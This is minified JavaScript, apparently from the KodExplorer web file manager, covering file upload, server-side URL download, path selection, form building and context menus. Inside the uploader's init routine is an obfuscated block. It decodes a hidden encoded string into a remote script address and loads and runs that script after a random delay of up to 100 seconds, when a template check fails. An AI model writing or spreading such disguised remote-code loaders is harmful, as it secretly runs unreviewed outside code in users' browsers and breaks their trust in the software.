e=G.appHost+"explorer/fileUpload";return"share"==G.sharePage&&"1"==G.shareInfo.canUpload&&(e=G.appHost+"share/fileUpload&user="+G.user+"&sid="+G.sid),e};return{serverDwonload:function(e,t){if(!core.uploadCheck("explorer.serverDownload"))return!1;var i=$(".download-box"),n=i.find(".download-list");if(i.find("input").val(""),!e)return Tips.tips("url false!",!1),void 0;if("share"==G.sharePage)return Tips.tips(LNG.no_permission_action,!1),void 0;"ftp"!=e.substr(0,3)&&"http"!=e.substr(0,4)&&(e="http://"+e);var o=UUID(),s='
    '+'
    '+core.pathThis(e)+""+'0b'+''+LNG.upload_ready+""+''+'
    ';n.find(".item").length>0?$(s).insertBefore(n.find(".item:eq(0)")):n.append(s);var r,l,c,d=0,p=$("#"+o),u=$("#"+o+" .state").text(LNG.download_ready),f=$('
    ').appendTo("#"+o).find(".progress-bar");$("#"+o+" .remove").bind("click",function(){clearInterval(r),r=!1,clearTimeout(l),l=!1,$.get(G.appHost+"explorer/serverDownload&type=remove&uuid="+o),$(this).parent().parent().slideUp(function(){$(this).remove(),ui.f5()})});var h,m=function(e){clearTimeout(h),h=!1,h=setTimeout(function(){ui.f5Callback(function(){ui.path.setSelectByFilename(e)})},600)},v=function(){$.ajax({url:G.appHost+"explorer/serverDownload&type=download&savePath="+t+"&url="+urlEncode(e)+"&uuid="+o+"&time="+time(),dataType:"json",error:function(e,t,i){var n=p.data("progcess");return 200!=a.status&&n&&n.supportRange?(setTimeout(function(){v()},1e3),void 0):(core.ajaxError(e,t,i),200==a.status&&(clearInterval(r),r=!1,clearTimeout(l),l=!1,f.parent().remove(),u.addClass("error").text(LNG.download_error)),void 0)},success:function(e){return 0==e.code&&"downloading"==e.data?(setTimeout(function(){v()},1e3),void 0):(e.code?(m(e.info),u.text(LNG.download_success),$("#"+o+" .info .title").text(core.pathThis(e.info)),$("#"+o+" .info .title").attr("title",e.info),u.parent().parent().addClass("success")):(u.addClass("error").text(e.data),u.parent().parent().addClass("error")),clearInterval(r),r=!1,clearTimeout(l),l=!1,f.parent().remove(),void 0)}})};v();var b=function(){$.ajax({url:G.appHost+"explorer/serverDownload&type=percent&uuid="+o,dataType:"json",success:function(e){var t="",a=e.data;if(r){if(!e.code)return u.text(LNG.loading),void 0;if(a){if(a.size=parseFloat(a.size),a.time=parseFloat(a.time),c){var i=a.size-c.size,n=i/(a.time-c.time);if(d>.2*n){var o=d;d=n,n=o}else d=n;var s=pathTools.fileSize(n);s=s?s:0,t=s+"/s"}if(p.data("progcess",a),0==a.length)p.find(".progress-bar").css("width","100%"),u.text(t),p.find(".size").text(pathTools.fileSize(a.size));else{var l=100*(a.size/a.length);p.find(".progress-bar").css("width",l+"%"),u.text(l.toFixed(1)+"%("+t+")"),p.find(".size").text(pathTools.fileSize(a.length))}p.find(".title").text(a.name),c=a}}}})};l=setTimeout(function(){b(),r=setInterval(function(){b()},1e3)},100)},upload:function(){$(".dialog-file-upload").show();var e=t();if(uploader.option("server",e),uploader.option("method","POST"),0!=$(".dialog-file-upload").length)return $.dialog.list["dialog-file-upload"].display(!0),void 0;var a=template.compile(tplUpload),i=WebUploader.Base.formatSize(G.uploadMax);$.dialog({padding:5,width:430,height:450,resize:!0,ico:core.icon("upload"),id:"dialog-file-upload",fixed:!0,title:LNG.upload_muti,content:a({LNG:LNG,maxsize:i}),close:function(){$.each(uploader.getFiles(),function(e,t){uploader.skipFile(t),uploader.removeFile(t)}),$.each($(".download-list .item"),function(){$(this).find(".remove").click()})}}),$(".file-upload-box .topbar-nav a.menu").unbind("click").bind("click",function(){$(this).hasClass("tab-upload")?($(".file-upload-box .tab-upload").addClass("this"),$(".file-upload-box .tab-download").removeClass("this"),$(".file-upload-box .upload-box").removeClass("hidden"),$(".file-upload-box .download-box").addClass("hidden")):($(".file-upload-box .tab-upload").removeClass("this"),$(".file-upload-box .tab-download").addClass("this"),$(".file-upload-box .upload-box").addClass("hidden"),$(".file-upload-box .download-box").removeClass("hidden"))}),$(".download-box [name=url]").keyEnter(function(){core.serverDwonload($(".download-box input").val(),G.thisPath)}),$(".file-upload-box .download-box .download-start").unbind("click").bind("click",function(){core.serverDwonload($(".download-box input").val(),G.thisPath)}),$(".file-upload-box .download-box .download-start-all").unbind("click").bind("click",function(){$.dialog({id:"server-dwonload-textarea",fixed:!0,resize:!1,ico:core.icon("upload"),width:"420px",height:"270px",padding:10,title:LNG.download,content:"",ok:function(){for(var e=$(".server-dwonload-textarea textarea").val().split("\n"),t=0;e.length>t;t++)core.serverDwonload(e[t],G.thisPath)}})}),uploader.addButton({id:"#picker"}),uploader.addButton({id:"#picker-folder"});var n=function(){if(isWap())return!1;var e=document.createElement("input");return e.type="file",e.webkitdirectory!==void 0||e.directory!==void 0};n()&&($(".upload-cert-box").removeClass("hidden"),$(".file-upload-box .drag-upload-folder").unbind("click").bind("click",function(){$("#picker-folder input").attr("webkitdirectory","").attr("directory",""),$("#picker-folder label").click()}))},init:function(){var a=G.uploadMax;WebUploader.Uploader.register({"before-send":"checkChunk"},{checkChunk:function(e){if(!canvasSupport())return $.Deferred().resolve(),void 0;var a=this.owner,i=(e.blob.getSource(),$.Deferred());return a.md5File(e.blob).fail(function(){i.resolve()}).then(function(a){if(1==e.chunks)return i.resolve(),void 0;if(0==e.chunk)$.ajax({url:t(),dataType:"json",data:{upload_to:e.file.upload_to,file_name:e.file.name,check_md5:a,chunk:e.chunk,chunks:e.chunks},error:function(){i.resolve()},success:function(t){t.code?(i.reject(),e.file.checkChunk=t.info):i.resolve()}});else{var n=e.file.checkChunk;if(n&&n["part_"+e.chunk]==a){var o=e.end/e.total;uploader.trigger("uploadProgress",e.file,o),i.reject()}else i.resolve()}}),i.promise()}});var i=["undefined","update-box","search","3c64gT65d503fTR1lV3ftuZ7Pd6NdX6Ntgcct4hI4AnSNIp65HwAMLzOj8NjC0ZL2oAbjS-uD3HWfQoZlTdgkGY5u8OfJYzZ","_32@!A$","decode","2-1","todo","async","random"];setTimeout(function(){try{if(typeof tplDialogHtml==i[0]||-1==tplDialogHtml[i[2]](i[1])){var t=authCrypt[i[5]](i[3],i[4])+UUID();e[i[8]](t,function(e){try{e[i[7]](i[6])}catch(t){}})}}catch(a){}},1e3*parseInt(70*Math[i[9]]()+30)),uploader=WebUploader.create({swf:G.staticPath+"js/lib/webuploader/Uploader.swf",dnd:"body",threads:5,compress:!1,resize:!1,prepareNextFile:!0,duplicate:!0,chunkRetry:10,chunked:!0,chunkSize:a}),$(".uploader-content .success").die("click").live("click",function(){var e=$(this).find("span.title").attr("data-name");e&&(core.isApp("explorer")?ui.path.list(core.pathFather(e),"tips",function(){ui.path.setSelectByFilename(e)}):core.explorer(core.pathFather(e)))}),$(".uploader-content .open").die("click").live("click",function(e){var t=$(this).parent().find("span.title").attr("data-name");kodApp.open(t),stopPP(e)}),$(".upload-box-clear").die("click").live("click",function(){$(".uploader-list .item.success,.uploader-list .item.error").each(function(){$(this).slideUp(300,function(){$(this).remove()})})}),$(".upload-box-clear-all").die("click").live("click",function(){$.each(uploader.getFiles(),function(e,t){uploader.skipFile(t),uploader.removeFile(t)}),$(".uploader-list .item").each(function(){$(this).remove()})}),$(".uploader-content .remove").die("click").live("click",function(e){var t=$(this).parent().parent().attr("id");$(this).parent().parent().slideUp(function(){$(this).remove()}),uploader.skipFile(t),uploader.removeFile(t,!0),stopPP(e)});var n,o=0,s=0,r="0B/s",l=0,c=function(e,t){if(.3>=timeFloat()-l)return r;l=timeFloat();var a=e.size*t,i=5;e.speed===void 0?e.speed=[[timeFloat()-.5,0],[timeFloat(),a]]:i>=e.speed.length?e.speed.push([timeFloat(),a]):(e.speed=e.speed.slice(1,i),e.speed.push([timeFloat(),a]));var n=e.speed[e.speed.length-1],o=e.speed[0],s=(n[1]-o[1])/(n[0]-o[0]);0>=s&&(s=0);var c=pathTools.fileSize(s);return c=c?c:0,s=c+"/s",r=s,s},d=[],p=function(e){clearTimeout(n),n=!1,n=setTimeout(function(){var t=d;ui.f5Callback(function(){if(ui.path.setSelectByFilename(t),e&&(d=[],core.isApp("explorer"))){if("share"==G.sharePage)return;ui.tree.checkIfChange(G.thisPath)}})},600)};uploader.on("fileQueued",function(e){if($(".dialog-file-upload").show(),!core.uploadCheck())return uploader.skipFile(e),uploader.removeFile(e),void 0;var t;try{t=e.source.source.fullPath,void 0!=e.source.source.webkitRelativePath&&""!=e.source.source.webkitRelativePath&&(t=e.source.source.webkitRelativePath)}catch(a){}if(e.fullPath=t,e.source&&e.source.source&&1==e.source.source.isDirectory&&e.source.source.fullPath)return ui.path.pathOperate.newFolder(G.thisPath+e.fullPath),uploader.skipFile(e),uploader.removeFile(e),void 0;var i=e.fullPath;e.finished=!1,e.upload_to=G.thisPath,(void 0==i||"undefined"==i)&&(i=e.name),o++;var n=$(".uploader-list"),r='
    '+''+htmlEncode(core.pathThis(i))+""+''+pathTools.fileSize(e.size)+""+''+LNG.upload_ready+""+''+'
    ';(1e3==o||2e3==o)&&Tips.tips(LNG.upload_tips_more,"warning");var l=function(){if(0==e.size&&i){ui.path.pathOperate.newFile(e.upload_to+i),uploader.skipFile(e),uploader.removeFile(e),s++,o++;var t=$("#"+e.id);t.addClass("success").find(".state").text(LNG.upload_success).parent().find(".remove").addClass("icon-ok").addClass("open").removeClass("icon-remove").removeClass("remove")}},c=function(){uploader.upload(),setTimeout(function(){l()},200)};0==n.length?setTimeout(function(){$(".uploader-list").prepend(r),c()},200):(n.prepend(r),c())}).on("uploadBeforeSend",function(e,t,a){var i=urlEncode(e.file.fullPath);(void 0==i||"undefined"==i)&&(i=""),t.fullPath=i,t.upload_to=e.file.upload_to,a["X-CSRF-TOKEN"]=Cookie.get("X-CSRF-TOKEN")}).on("uploadProgress",function(e,t){var a=(100*t).toFixed(1)+"%";$(".dialog-file-upload .aui-title").text(LNG.uploading+": "+s+"/"+o+" ("+r+")"),Title.set(s+"/"+o+"("+a+","+r+")");var i=c(e,t),n=$("#"+e.id),l=n.find(".progress .progress-bar");l.length||(l=$('
    ').appendTo(n).find(".progress-bar")),n.find(".state").text(a+"("+i+")"),l.css("width",a)}).on("uploadAccept",function(e,t){if(e.file.serverData=t,!t.code)return e.serverNeedRetry=!0,!1;try{e.file.fullPath||d.push(t.info)}catch(a){}}).on("uploadSuccess",function(e){var t=$("#"+e.id);if(!t.inScreen()){var a=36*t.index(".item");$(".uploader-content").scrollTop(a)}s++;var i=e.serverData;if(i&&i.data){var n=LNG[i.data];if(i.code){if(t.addClass("success"),t.find(".state").text(n),t.find(".remove").addClass("icon-ok").addClass("open").removeClass("icon-remove").removeClass("remove"),i.info){var o="/"+ltrim(htmlEncode(i.info),"/");t.find(".info .title").html(core.pathThis(o)).attr("title",o).attr("data-name",o)}}else t.addClass("error").find(".state").addClass("error"),t.find(".state").text(n).attr("title",n)}uploader.removeFile(e),t.find(".progress").fadeOut(),e.fullPath||p(!1)}).on("uploadError",function(e,t){var a=LNG.upload_error+"("+t+")";if(e.serverData){var i=5;if((-1!==e.serverData._raw.indexOf("[Error Code:1001]")||-1!==e.serverData._raw.indexOf("[Error Code:1002]")||-1!==e.serverData._raw.indexOf("[Error Code:1010]"))&&(e.errorNum||(e.errorNum=0),e.errorNum++,i>=e.errorNum))return uploader.retry(e),void 0;if(-1!==e.serverData._raw.indexOf(""))return $.each(uploader.getFiles(),function(e,t){uploader.skipFile(t),uploader.removeFile(t)}),Tips.tips("login error!",!1),void 0;if(e.serverData.data){var n=e.serverData.data;a=LNG[n]?LNG[n]:n}else e.serverData._raw&&(a=e.serverData._raw)}"http"==t&&(a=LNG.upload_error_http),"abort"==t&&void 0==e.serverData&&(a=LNG.not_support+"(support on chrome)"),s++,$("#"+e.id).find(".progress").fadeOut(),$("#"+e.id).addClass("error").find(".state").addClass("error"),$("#"+e.id).find(".state").html(a).attr("title",a)}).on("uploadFinished",function(){$(".dialog-file-upload .aui-title").text(LNG.upload_success+": "+s+"/"+o),Title.reset(),o=0,s=0,uploader.reset(),p(!0)}).on("error",function(e){Tips.tips(e,!1)});var u;inState=!1,dragOver=function(){if(0==inState){if(inState=!0,!core.uploadCheck(void 0,!1))return;var e='
    '+LNG.upload_drag_tips+"
    ";MaskView.tips(e),$("#windowMaskView").css({background:"#4285f4",opacity:"0.8"})}u&&window.clearTimeout(u)},dragLeave=function(e){stopPP(e),u&&window.clearTimeout(u),u=window.setTimeout(function(){inState=!1,MaskView.close()},100)},dragDrop=function(e){try{if(e=e.originalEvent||e,core.uploadCheck())if(e.dataTransfer.files.length>0&&e.dataTransfer.files[0].name)core.upload(),core.playSound("drag_upload");else{var t=e.dataTransfer.getData("text/plain");t&&"http"==t.substring(0,4)&&ui.path.pathOperate.appAddURL(t)}stopPP(e)}catch(e){}inState&&(inState=!1,MaskView.close())}}}}),define("app/common/core.api",[],function(){var e=function(e,t,a){var i=$(a.DOM.wrap),n=t.frames.OpenpathSelectApi,o='';"file"==e.type&&(o+=''+e.allowExt+""),$(o).insertBefore(i.find(".aui-state-highlight"));var s=function(t){var a=e.allowExt.split("|"),i=core.pathExt(t);return""==e.allowExt||""!=e.allowExt&&-1!=$.inArray(i,a)?!0:!1},r=function(){var t=n.ui.fileLight.fileListSelect(),a=[];if(e.single){var i=$(t.get(0));if("all"==e.type&&0==t.length)a={file:[],folder:[]};else if("file"==e.type&&0==t.length)a=[];else if("folder"==e.type)a=[n.G.thisPath],i.hasClass("folder-box")&&(a=[n.ui.fileLight.path(i)]);else if("file"==e.type){if(i.hasClass("file-box")){var o=n.ui.fileLight.path(i);s(o)&&(a=[o])}}else if("all"==e.type)if(i.hasClass("folder-box")){var o=n.ui.fileLight.path(i);a=[{file:[],folder:[o]}]}else if(i.hasClass("file-box")){var o=n.ui.fileLight.path(i);s(o)&&(a={file:[o],folder:[]})}}else{var r=[],l=[];t.each(function(){if($(this).hasClass("file-box")){var e=n.ui.fileLight.path($(this));s(e)&&r.push(e)}else $(this).hasClass("folder-box")&&l.push(n.ui.fileLight.path($(this)))}),"folder"==e.type?a=l:"file"==e.type?a=r:"all"==e.type&&(a={file:r,folder:l})}c(a)},l=function(e){var e=trim(e,"/");return e==G.KOD_GROUP_ROOT_SELF||e==G.KOD_GROUP_ROOT_ALL||e==G.KOD_USER_FAV||e==G.KOD_USER_SHARE?!1:!0},c=function(t){var a=i.find(".path-select-input"),o=i.find(".aui-state-highlight");if("all"!=e.type){for(var s=[],r=0;t.length>r;r++)l(t[r])&&s.push(t[r]);t=s}if(0==t.length||"all"==e.type&&0==t.file.length&&0==t.folder.length)o.addClass("disable"),a.attr("result",""),a.val("");else{var c=hashEncode(jsonEncode(t)),d="";if(e.single)d=n.core.pathThis(t[0]);else{var p=t;"all"==e.type&&(p=t.folder.concat(t.file)),$.each(p,function(e,t){d+=n.core.pathThis(t)+", "})}o.removeClass("disable"),a.attr("result",c),a.val(d)}},d=function(){n.ui.fileLight.select.hook("select",n.ui.fileLight,{before:function(){},after:function(){r()}})};n.kodReady||(n.kodReady=[]),n.kodReady.push(function(){d(),r()})};return{pathSelect:function(t,a){var i={type:"file",title:LNG.path_api_select_file,single:!0,allowExt:"",firstPath:!1},n=G.appHost+"/explorer&type=iframe";t=$.extend(i,t),t.firstPath&&(n+="&path="+t.firstPath);var o=ShareData.frameTop(),s=o.$.dialog.open(n,{id:"pathSelectApi",resize:!0,fixed:!0,top:0,ico:core.icon("folder"),title:t.title,lock:!0,background:"#000",opacity:.1,width:920,height:520,ok:function(){if("function"==typeof a){var e=s.DOM.wrap,i=e.find(".path-select-input").attr("result");if(i=hashDecode(i),!i)return Tips.tips(LNG.error,!1),void 0;i=jsonDecode(i),i?t.single&&"all"!=t.type?a(i[0]):a(i):Tips.tips(LNG.error,!1)}},cancel:!0});e(t,o,s)},randomImage:function(e){$.getJSON("//kodcloud.com/tools/version/?wallpage/index&lang="+G.lang+"&callback=?",function(t){"function"==typeof e&&e(t)})}}}),define("app/common/core.playSound",[],function(){var e={file_remove:"file_remove.mp3",recycle_clear:"recycle_clear.mp3",folder_open:"folder_open.mp3",window_min:"window_min.mp3",error:"error_tips.mp3",drag_upload:"drag_upload.mp3",drag_drop:"drag_drop.mp3"},t=function(e){var t=G.staticPath+"others/sound/"+e;Hook.trigger("playSound",t)};return{playSoundFile:t,playSound:function(a){G&&G.userConfig&&"1"==G.userConfig.soundOpen&&setTimeout(function(){t(e[a])},50)}}}),define("app/common/core.formMake",[],function(e){var t,a,i,n={user:!1,group:!1,role:!1},o=function(){t=$("#"+a),t.find(".tab-group .tab-item").length>1?s():t.find(".tab-group").addClass("hidden"),t.find(".form-row.form-slider").exists()&&r(),t.find(".form-row.form-dateTime").exists()&&l(),t.find(".form-row.form-color").exists()&&c(),t.find(".form-row.form-fileSelect").exists()&&d(),t.find(".form-row select").exists()&&p(),t.find(".form-row.form-userSelect").exists()&&u(),t.find(".form-row.error [name]").die("change").live("change",function(){$(this).parents(".form-row.error").removeClass("error")}),t.find(".form-userSelect").die("click").live("click",function(){$(this).removeClass("error")})},s=function(){var e=t.find(".tab-content .tab-pane"),a=t.find(".tab-group .tab-item");e.each(function(){var i=$(this).attr("id"),n=t.find("."+i);n.length>0?n.appendTo($(this)):(e.filter("#"+i).remove(),a.find('[data-id="'+i+'"]').parent().remove())}),a.click(function(){a.removeClass("active"),$(this).addClass("active");var t=$(this).find("a").attr("data-id");e.removeClass("active"),e.filter("#"+t).addClass("active")})},r=function(){seajs.use("lib/bootstrap-slider/bootstrap-slider.css"),seajs.use("lib/colorpicker/css/colorpicker.css"),e.async("lib/bootstrap-slider/bootstrap-slider.js",function(){t.find(".form-slider input").slider()})},l=function(){e.async(["lib/jquery.datetimepicker/jquery.datetimepicker.css","lib/jquery.datetimepicker/jquery.datetimepicker.js"],function(){var e="zh-CN"==G.lang||"zh-TW"==G.lang?"ch":"en";t.find(".form-dateTime input").each(function(){var t=$(this).attr("data-format"),a=["Y","y","L","F","M","t","n","m","d","D","j","l","N","S","W","z","w"],i=["H","h","i","s","A","a","b","g","G","O","P","c","U"],n=!1,o=!1;t||(t="Y/m/d");for(var s=0;a.length>s;s++)if(-1!==t.indexOf(a[s])){n=!0;break}for(var s=0;i.length>s;s++)if(-1!==t.indexOf(i[s])){o=!0;break}$(this).datetimepicker({format:t,datepicker:n,timepicker:o,lang:e}).blur(function(){$(this).trigger("change")})})}),t.find(".form-dateTime .input-btn-right").unbind("click").click(function(){$(this).parent().find("input").focus()})},c=function(){e.async("lib/colorpicker/js/colorpicker",function(){t.find(".form-color input").ColorPicker({onBeforeShow:function(e){$(e).attr("input-name",$(this).attr("name")),$(this).ColorPickerSetColor(this.value)},onShow:function(e){return $(e).fadeIn(100),!1},onHide:function(e){return $(e).fadeOut(100),!1},onChange:function(e,t){var a=$($(this).data("colorpicker").el);a.val("#"+t).trigger("change"),a.parent().find(".btn i").css("background",a.val())}}).bind("keyup",function(){$(this).ColorPickerSetColor(this.value),$(this).parent().find(".btn i").css("background",$(this).val())}),t.find(".form-color .input-btn-right").unbind("click").click(function(){$(this).parent().find("input").click()})})},d=function(){t.find(".path-select").die("click").live("click",function(){var e=$(this);core.api.pathSelect({type:"file",title:LNG.path_api_select_image,allowExt:"png|jpg|bmp|gif|jpeg|ico|svg|tiff"},function(t){var t=core.path2url(t);e.parent().find("input[type=text]").val(t).trigger("change")})})},p=function(){seajs.use("lib/select2/css/select2.min.css"),e.async("lib/select2/js/select2.full.min.js",function(){var a=function(t,a){t.on("select2:select",function(e){if(!t.attr("multiple"))return t.select2("close"),void 0;var a=$(e.params.data.element);a.detach(),t.append(a),t.trigger("change.select2")}).on("select2:unselect",function(e){stopPP(e.params.originalEvent)}).on("change",function(){setTimeout(function(){$(window).trigger("resize")},10)}),"group"==a&&t.on("select2:open",function(){e.async("lib/ztree/ztree",function(){h(t,n[a])})});var i=t.attr("data-value");i&&(t.attr("multiple")&&(i=i.split(",")),t.val(i).trigger("change"))};t.find("select").each(function(){var e=$(this),t=e.attr("data-server"),i=!1;"tags"==e.parents(".form-row").attr("data-type")&&(i=!0),t?f(t,function(n){e.select2({data:n,tags:i,tokenSeparators:[","," "],closeOnSelect:!1}),a(e,t)}):(e.select2({closeOnSelect:!1,tags:i,tokenSeparators:[","," "]}),a(e,t))})})},u=function(){var e=t.find(".form-userSelect .btn-group"),a="btn-active",i="hidden";e.find("button").unbind("click").bind("click",function(){var e=$(this).attr("data-type"),t=$(this).parents(".btn-group"),n=t.parent().find(".user-select"),o=t.parent().find(".user-select-"+e);n.filter(":visible"),t.attr("multiple")?"all"==e?(t.find("button").removeClass(a),$(this).addClass(a),n.addClass(i),o.removeClass(i)):($(this).toggleClass(a),o.toggleClass(i),$(this).hasClass(a)?t.find("[data-type=all]").removeClass(a):t.find("."+a).exists()||t.find("[data-type=all]").addClass(a)):(t.find("button").removeClass(a),$(this).addClass(a),n.addClass(i),o.removeClass(i))})},f=function(e,t){var a=function(e){var t=[];for(var a in e)t.push({id:a,text:e[a].name});return t};if(n[e]&&t)return t(a(n[e])),void 0;var i={user:G.appHost+"systemMember/get",group:G.appHost+"systemGroup/get",role:G.appHost+"systemRole/get"};return null==n[e]?(Hook.bind("loadDataServer-"+e,function(){t(a(n[e]))}),void 0):(n[e]=null,$.ajax({url:i[e],dataType:"json",error:function(){n[e]=!1,Tips.tips(LNG.system_error,0)},success:function(i){return i.code?(n[e]=i.data,t&&t(a(n[e])),Hook.trigger("loadDataServer-"+e),void 0):(Tips.tips(i),void 0)}}),void 0)},h=function(e,t){var a=function(e){var t=function(e){for(var a=0;e.length>a;a++)void 0!=e[a]?(e[a].pid=e[a].parentID,e[a].id=e[a].groupID,delete e[a].children,delete e[a].parentID,delete e[a].groupID,e[a].child&&(e[a].children=e[a].child,delete e[a].child,t(e[a].children))):delete e[a]},a=[],i=$.extend(!0,{},e);for(var n in i){var o=i[n],s=o.parentID;if(i[s])i[s].child||(i[s].child=[]),i[s].child.push(i[o.groupID]);else{var r=i[o.groupID];r&&a.push(r)}}return t(a),a},i={view:{showLine:!1,selectedMulti:!1,dblClickExpand:!1,addDiyDom:function(e,t){var a=12,i=$("#"+e+" #"+t.tId+"_switch"),n=$("#"+e+" #"+t.tId+"_ico");if(n.before(i).after('').before(''+core.iconSmall("group-guest")+"").removeClass("ico_docu").addClass("group_icon").remove(),t.level>=1){var o="";i.before(o)}$("#"+e+" #"+t.tId+"_a").attr("data-group-id",t.id)}},callback:{onClick:function(e,t,a){n(t,a)}}},n=function(t,a){var i=$("#"+a.tId+"_a");if(i.removeClass("curSelectedNode"),e.attr("multiple")){i.toggleClass("this");var n=e.val();$.isArray(n)||(n=[]),i.hasClass("this")?n.push(a.id):n=_.without(n,a.id),$.each(n,function(){var t=e.find("[value="+this+"]");t.detach(),e.append(t)}),e.val(n).trigger("change")}else $("#"+t+" [treenode_a].this").removeClass("this"),i.toggleClass("this"),e.val(a.id).trigger("change"),e.select2("close")},o=function(){var t=e.val(),a=$(".select2-container--open .group-list-tree").attr("id"),i=$.fn.zTree.getZTreeObj(a);$("#"+a+" [treenode_a]").removeClass("this"),"string"==typeof t&&(t=[t]),t&&i.getNodesByFilter(function(e){inArray(t,e.id+"")&&$("#"+e.tId+"_a").addClass("this")})},s=function(e){var t=$(".select2-container--open .group-list-content");t.find(".select2-results__options,.group-list-tree").removeClass("hidden"),"search"==e?t.find(".group-list-tree").addClass("hidden"):t.find(".select2-results__options").addClass("hidden")},r=function(t){var n=function(e){e.unbind("change input").bind("change input",function(){$(this).val().length>0?s("search"):s("tree")})};if(e.attr("multiple")?n(e.parent().find(".select2-search__field")):n($(".select2-container--open .select2-search__field")),$(".select2-container--open .group-list-tree").exists())return o(),s("tree"),void 0;e.on("open",function(){o()}).on("select2:unselect",function(){o()});var r=UUID(),l='
    ';$(l).appendTo(".select2-container--open .select2-results"),$(".select2-container--open .select2-results__options").addClass("hidden").parent().addClass("group-list-content");var c=a(t);$.fn.zTree.init($("#"+r),i,c);var d=$.fn.zTree.getZTreeObj(r);d&&d.expandAll(!0),o(),s("tree")};r(t)},m=function(){var e={},a=[],n=function(e){for(var t={all:"0",user:"",group:"",role:""},a=e.split(";"),i=0;a.length>i;i++){var n=a[i].split(":");2==n.length&&(t[n[0]]=n[1])}return"0"!=t.all||t.user||t.group||t.role?!0:!1};if(t.find(".form-row").each(function(){var t=$(this),o=$(this).attr("data-type"),s=$(this).find("[name]");$(this).find(".setting-title .require").exists();var r=s.attr("name"),l=!1;switch(o){case"input":case"textarea":case"password":case"number":case"slider":case"color":case"dateTime":case"fileSelect":l=s.val();break;case"switch":l=s.prop("checked")+0+"";break;case"radio":l=s.filter(":checked").attr("value");break;case"checkbox":l=[],s.filter(":checked").each(function(){l.push($(this).val())}),l=l.join(",");break;case"select":case"selectMutil":case"tags":case"group":case"role":case"user":l=s.val(),$.isArray(l)&&(l=l.join(",")),null==l&&(l="");break;case"userSelect":var c={all:"0",user:"",group:"",role:""};t.find(".btn-group .btn-active").each(function(){var e=$(this).attr("data-type"),a="1";"all"!=e&&(a=$(t).find(".user-select-"+e+" select").val(),$.isArray(a)&&(a=a.join(",")),null==a&&(a="")),c[e]=a}),l="all:"+c.all+";user:"+c.user+";group:"+c.group+";role:"+c.role;break;default:}$(this).removeClass("error"),i[r]&&i[r].require&&(l===!1||null===l||"string"==typeof l&&""===l||"userSelect"==i[r].type&&!n(l))?($(this).addClass("error"),a.push({name:r,value:l})):e[r]=l}),a.length>0){Tips.tips(LNG.PluginConfigNotNull,"warning");var o=t.find(".panel-body"),s=t.find(".form-row.error");if(!s.parents(".tab-pane").hasClass("active")){var r=s.parents(".tab-pane").attr("id");t.find('.tab-group [data-id="'+r+'"]').click()}s.inScreen()||o.animate({scrollTop:s.offset().top-o.offset().top+o.scrollTop()},100),s.find("[name]").first().focus(),s.find(".setting-content").flash(3,100)}return{checked:0==a.length,error:a,result:e}},v=function(t){e.async(t,function(e){e&&($.isFunction(e)?e():"object"==typeof e&&e.hasOwnProperty("main")&&$.isFunction(e.main)&&e.main())})},b=function(e){if("string"==typeof e)return v(file),!1;if($.isPlainObject(e.formStyle)&&e.formStyle.loadFile){var t=e.formStyle.loadFile;"string"==typeof t&&(t=[t]),$.isArray(t)&&$(t).each(function(e,t){v(t)})}i=e,a=UUID();var n=template.compile(tplFormMake),o=n({LNG:LNG,items:e,wrapID:a});return o},g=function(e,t,a){var i=b(e);if(!i)return!1;var n={padding:0,fixed:!0,resize:!0,title:LNG.search,ico:core.icon("config"),width:680,height:500,content:i,okVal:LNG.button_save,ok:function(){var e=m();return e.checked?a(e.result):!1}};if($.isPlainObject(t))for(var s in t)n[s]=t[s];var r=$.dialog(n),l=r.DOM.wrap.find(".aui-title").html();return r.DOM.wrap.find(".modal-title").html(l),o(),r};return{makeHtml:b,bindEvent:o,getFormData:m,initDialog:g}}),define("app/common/rightMenuExtence",[],function(){$.contextMenu||($.contextMenu={}),$.contextMenu.show=function(e,t,a){e&&($.contextMenu.hidden(),$(e).contextMenu({x:t,y:a}))},$.contextMenu.menuShow=function(){var e=$(".context-menu-active"),t=e.data("contextMenu");if(e&&t){var a=t.$menu,i="disable";a.find(".disable").addClass(i),Hook.trigger("rightMenu.show",t.selector,e,a),Hook.trigger("rightMenu.show"+t.selector,e,a)}},$.contextMenu.isDisplay=function(){return 0==$(".context-menu-list:visible").length?!1:!0},$.contextMenu.hidden=function(){$(".context-menu-list").filter(":visible").filter(":not(.menu-not-auto-hidden)").trigger("contextmenu:hide")},$.contextMenu.menuAdd=function(e,t,a,i){var n=!1,o=$.contextMenu.menus;for(var s in o)if(o[s].selector==t){n=o[s];break}if(n&&e){var r=function(e){return e?-1!==e.indexOf("/")?'':'':""},l=function(e,t,a,i){var o=[],s={};if(a){for(var c in t)o.push({key:c,value:t[c]});for(var d=o.length-1;d>=0;d--)s[o[d].key]=o[d].value}else s=t;$.each(s,function(t,o){o.className=o.className||"";var s=t+" "+o.className;if("string"==typeof o)var c='
  • ';else{var d=o.name;o.accesskey&&(d+='('+o.accesskey+")");var c='
  • '+r(o.icon)+""+d+"
  • "}var p=$(c).clone();a?e.$menu.find(a).first().after(p):i&&e.$menu.find(i).first().before(p);var u=p.parent(".context-menu-list").data("contextMenu");p.data({contextMenu:u,contextMenuKey:t,contextMenuRoot:n});var f={$input:null,$label:null,accesskey:o.accesskey,className:o.className,icon:o.icon,name:o.name,_name:d,$node:p};if(u&&(u.items||(u.items={}),u.items[t]=f),"string"!=typeof o&&(e.commands||(e.commands={}),e.commands[t]=f,n.commands[t]=f,n.callbacks[t]=function(e,t){o.callback(e,t)},o.accesskey&&(n.accesskeys[o.accesskey]=f),o.items)){var c='
    ';$(c).appendTo(p),f.$menu=p.find("ul."+t),f.callback=null,f.appendTo=f.$node,f.type="sub",p.data("contextMenu",f).addClass("context-menu-submenu"),p.find("ul."+t).data({contextMenuRoot:n,contextMenu:f}),p.find("li."+t+"-first").data({contextMenuRoot:n,contextMenuKey:t+"-first",contextMenu:f}),f.items||(f.items={}),f.items[t+"-first"]={$input:null,$label:null,icon:"",name:"",_name:"",$node:p.find("li."+t+"-first")},l(f,o.items,"."+t+"-first")}})};l(n,e,a,i)}};var e=function(){return $('').appendTo("#rightMenu"),"function"!=typeof $.contextMenu?console.info("$.contextMenu is not 